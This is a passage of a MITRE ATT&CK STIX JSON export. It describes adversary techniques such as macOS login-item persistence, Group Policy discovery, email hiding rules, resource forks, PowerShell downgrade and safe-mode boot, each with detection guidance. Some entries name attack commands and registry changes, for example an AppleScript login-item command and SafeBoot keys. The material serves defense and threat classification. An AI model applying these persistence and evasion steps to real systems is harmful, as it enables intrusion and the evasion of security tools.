SMLoginItemSetEnabled.\n\nLogin items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.\n\nAdversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the \u201cSystem Events\u201d process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as tell application \u201cSystem Events\u201d to make login item at end with properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1547/015",
"external_id": "T1547.015"
},
{
"source_name": "Open Login Items Apple",
"description": "Apple. (n.d.). Open items automatically when you log in on Mac. Retrieved October 1, 2021.",
"url": "https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac"
},
{
"source_name": "Adding Login Items",
"description": "Apple. (2016, September 13). Adding Login Items. Retrieved July 11, 2017.",
"url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html"
},
{
"source_name": "SMLoginItemSetEnabled Schroeder 2013",
"description": "Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified. Retrieved October 5, 2021.",
"url": "https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/"
},
{
"source_name": "Launch Services Apple Developer",
"description": "Apple. (n.d.). Launch Services. Retrieved October 5, 2021.",
"url": "https://developer.apple.com/documentation/coreservices/launch_services"
},
{
"source_name": "ELC Running at startup",
"description": "hoakley. (2018, May 22). Running at startup: when to use a Login Item or a LaunchAgent/LaunchDaemon. Retrieved October 5, 2021.",
"url": "https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/"
},
{
"source_name": "Login Items AE",
"description": "Apple. (n.d.). Login Items AE. Retrieved October 4, 2021.",
"url": "https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//apple_ref/doc/uid/DTS10003788"
},
{
"source_name": "Startup Items Eclectic",
"description": "hoakley. (2021, September 16). How to run an app or tool at startup. Retrieved October 5, 2021.",
"url": "https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/"
},
{
"source_name": "hexed osx.dok analysis 2019",
"description": "fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021.",
"url": "http://www.hexed.in/2019/07/osxdok-analysis.html"
},
{
"source_name": "Add List Remove Login Items Apple Script",
"description": "kaloprominat. (2013, July 30). macos: manage add list remove login items apple script. Retrieved October 5, 2021.",
"url": "https://gist.github.com/kaloprominat/6111584"
},
{
"source_name": "objsee mac malware 2017",
"description": "Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.",
"url": "https://objective-see.com/blog/blog_0x25.html"
},
{
"source_name": "CheckPoint Dok",
"description": "Ofer Caspi. (2017, May 4). OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic. Retrieved October 5, 2021.",
"url": "https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/"
},
{
"source_name": "objsee netwire backdoor 2019",
"description": "Patrick Wardle. (2019, June 20). Burned by Fire(fox). Retrieved October 1, 2021.",
"url": "https://objective-see.com/blog/blog_0x44.html"
},
{
"source_name": "objsee block blocking login items",
"description": "Patrick Wardle. (2018, July 23). Block Blocking Login Items. Retrieved October 1, 2021.",
"url": "https://objective-see.com/blog/blog_0x31.html"
},
{
"source_name": "sentinelone macos persist Jun 2019",
"description": "Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.",
"url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/"
},
{
"source_name": "Launch Service Keys Developer Apple",
"description": "Apple. (2018, June 4). Launch Services Keys. Retrieved October 5, 2021.",
"url": "https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"File: File Modification",
"File: File Creation"
],
"x_mitre_detection": "All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.\n\nOtherwise, login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)\n\nMonitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"macOS"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--8565825b-21c8-4518-b75e-cbc4c717a156",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-10-01 17:58:26.445000+00:00",
"modified": "2021-10-07 18:19:25.352000+00:00",
"name": "Cloud Storage Object Discovery",
"description": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.\n\nCloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1619",
"external_id": "T1619"
},
{
"source_name": "ListObjectsV2",
"description": "Amazon - ListObjectsV2. Retrieved October 4, 2021.",
"url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html"
},
{
"source_name": "List Blobs",
"description": "Microsoft - List Blobs. (n.d.). Retrieved October 4, 2021.",
"url": "https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Regina Elwell",
"Isif Ibrahima"
],
"x_mitre_data_sources": [
"Cloud Storage: Cloud Storage Enumeration",
"Cloud Storage: Cloud Storage Access"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. \nMonitor cloud logs for API calls used for file or object enumeration for unusual activity. ",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"IaaS"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--cff94884-3b1c-4987-a70b-6d5643c621c3",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-05-11 18:51:16.343000+00:00",
"modified": "2021-10-16 01:35:43.483000+00:00",
"name": "Code Repositories",
"description": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\n\n\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "collection"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1213/003",
"external_id": "T1213.003"
},
{
"source_name": "Wired Uber Breach",
"description": "Andy Greenberg. (2017, January 21). Hack Brief: Uber Paid Off Hackers to Hide a 57-Million User Data Breach. Retrieved May 14, 2021.",
"url": "https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/"
},
{
"source_name": "Krebs Adobe",
"description": "Brian Krebs. (2013, October 3). Adobe To Announce Source Code, Customer Data Breach. Retrieved May 17, 2021.",
"url": "https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Itamar Mizrahi, Cymptom",
"Toby Kohlenberg",
"Josh Liburdi, @jshlbrd"
],
"x_mitre_data_sources": [
"Logon Session: Logon Session Creation",
"Application Log: Application Log Content"
],
"x_mitre_detection": "Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"SaaS"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-06 13:10:12.916000+00:00",
"modified": "2021-10-15 23:16:28.296000+00:00",
"name": "Group Policy Discovery",
"description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path \\\\SYSVOL\\\\Policies\\ .(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)\n\nAdversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1615",
"external_id": "T1615"
},
{
"source_name": "TechNet Group Policy Basics",
"description": "srachui. (2012, February 13). Group Policy Basics \u2013 Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.",
"url": "https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/"
},
{
"source_name": "ADSecurity GPO Persistence 2016",
"description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.",
"url": "https://adsecurity.org/?p=2716"
},
{
"source_name": "Microsoft gpresult",
"description": "Microsoft. (2017, October 16). gpresult. Retrieved August 6, 2021.",
"url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult"
},
{
"source_name": "Github PowerShell Empire",
"description": "Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.",
"url": "https://github.com/EmpireProject/Empire"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Ted Samuels, Rapid7",
"Jonhnathan Ribeiro, 3CORESec, @_w0rk3r"
],
"x_mitre_data_sources": [
"Network Traffic: Network Traffic Content",
"Active Directory: Active Directory Object Access",
"Script: Script Execution",
"Command: Command Execution",
"Process: Process Creation"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor for suspicious use of gpresult. Monitor for the use of PowerShell functions such as Get-DomainGPO and Get-DomainGPOLocalGroup and processes spawning with command-line arguments containing GPOLocalGroup.\n\nMonitor for abnormal LDAP queries with filters for groupPolicyContainer and high volumes of LDAP traffic to domain controllers. Windows Event ID 4661 can also be used to detect when a directory service has been accessed.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-07 13:20:23.767000+00:00",
"modified": "2021-10-16 01:24:31.674000+00:00",
"name": "Email Hiding Rules",
"description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1564/008",
"external_id": "T1564.008"
},
{
"source_name": "Microsoft Inbox Rules",
"description": "Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.",
"url": "https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59"
},
{
"source_name": "MacOS Email Rules",
"description": "Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.",
"url": "https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac"
},
{
"source_name": "Microsoft New-InboxRule",
"description": "Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.",
"url": "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps"
},
{
"source_name": "Microsoft Set-InboxRule",
"description": "Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.",
"url": "https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps"
},
{
"source_name": "Microsoft Cloud App Security",
"description": "Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.",
"url": "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154"
},
{
"source_name": "Microsoft BEC Campaign",
"description": "Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.",
"url": "https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Dor Edry, Microsoft"
],
"x_mitre_data_sources": [
"File: File Modification",
"Command: Command Execution",
"Application Log: Application Log Content"
],
"x_mitre_detection": "Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.\n\nOn Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule and Set-InboxRule PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.(Citation: MacOS Email Rules)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"Office 365",
"Linux",
"macOS"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-10-12 20:02:31.866000+00:00",
"modified": "2021-10-16 01:50:40.276000+00:00",
"name": "Resource Forking",
"description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file\u2019s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1564/009",
"external_id": "T1564.009"
},
{
"source_name": "macOS Hierarchical File System Overview",
"description": "Tenon. (n.d.). Retrieved October 12, 2021.",
"url": "http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553"
},
{
"source_name": "Resource and Data Forks",
"description": "Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved October 12, 2021.",
"url": "https://flylib.com/books/en/4.395.1.192/1/"
},
{
"source_name": "ELC Extended Attributes",
"description": "Howard Oakley. (2020, October 24). There's more to files than data: Extended Attributes. Retrieved October 12, 2021.",
"url": "https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/"
},
{
"source_name": "sentinellabs resource named fork 2020",
"description": "Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.",
"url": "https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/"
},
{
"source_name": "tau bundlore erika noerenberg 2020",
"description": "Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.",
"url": "https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Jaron Bradley @jbradley89",
"Ivan Sinyakov"
],
"x_mitre_data_sources": [
"File: File Creation",
"Process: Process Creation",
"File: File Metadata",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Notarization; Gatekeeper"
],
"x_mitre_detection": "Identify files with the com.apple.ResourceFork extended attribute and large data amounts stored in resource forks. \n\nMonitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. ",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"macOS"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-10-08 14:06:28.212000+00:00",
"modified": "2021-10-15 00:48:06.723000+00:00",
"name": "Downgrade Attack",
"description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)\n\nAdversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1562/010",
"external_id": "T1562.010"
},
{
"source_name": "CrowdStrike BGH Ransomware 2021",
"description": "Falcon Complete Team. (2021, May 11). Response When Minutes Matter: Rising Up Against Ransomware. Retrieved October 8, 2021.",
"url": "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/"
},
{
"source_name": "Mandiant BYOL 2018",
"description": "Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) \u2013 A Novel Red Teaming Technique. Retrieved October 8, 2021.",
"url": "https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique"
},
{
"source_name": "Praetorian TLS Downgrade Attack 2014",
"description": "Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.",
"url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Command: Command Execution",
"Process: Process Metadata",
"Process: Process Creation"
],
"x_mitre_detection": "Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell \u2013v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-23 20:00:27.600000+00:00",
"modified": "2021-08-31 14:51:47.352000+00:00",
"name": "Safe Mode Boot",
"description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1562/009",
"external_id": "T1562.009"
},
{
"source_name": "Microsoft Safe Mode",
"description": "Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021.",
"url": "https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234"
},
{
"source_name": "Sophos Snatch Ransomware 2019",
"description": "Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021.",
"url": "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/"
},
{
"source_name": "Microsoft bcdedit 2021",
"description": "Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021.",
"url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit"
},
{
"source_name": "CyberArk Labs Safe Mode 2016",
"description": "Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.",
"url": "https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise"
},
{
"source_name": "Cybereason Nocturnus MedusaLocker 2020",
"description": "Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021.",
"url": "https://www.cybereason.com/blog/medusalocker-ransomware"
},
{
"source_name": "BleepingComputer REvil 2021",
"description": "Abrams, L. (2021, March 19). REvil ransomware has a new \u2018Windows Safe Mode\u2019 encryption mode. Retrieved June 23, 2021.",
"url": "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/"
},
{
"source_name": "Microsoft Bootcfg",
"description": "Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021.",
"url": "https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Jorell Magtibay, National Australia Bank Limited",
"Kiyohito Yamamoto, RedLark, NTT Communications",
"Yusuke Kubo, RedLark, NTT Communications"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Windows Registry: Windows Registry Key Modification",
"Windows Registry: Windows Registry Key Creation",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Host Intrusion Prevention Systems",
"Anti-virus"
],
"x_mitre_detection": "Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a \\* in front of the \"Startup\" value name: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[\"\\*Startup\"=\"{Path}\"] or by adding a key to HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)\n\nMonitor execution of processes and commands associated with making configuration changes to boot settings, such as bcdedit.exe and bootcfg.exe.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "attack-pattern",
"id": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-04 20:54:03.066000+00:00",
"modified": "2021-10-14 21:09:59.588000+00:00",
"name": "Double File Extension",
"description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system\u2019s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user\u2019s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file 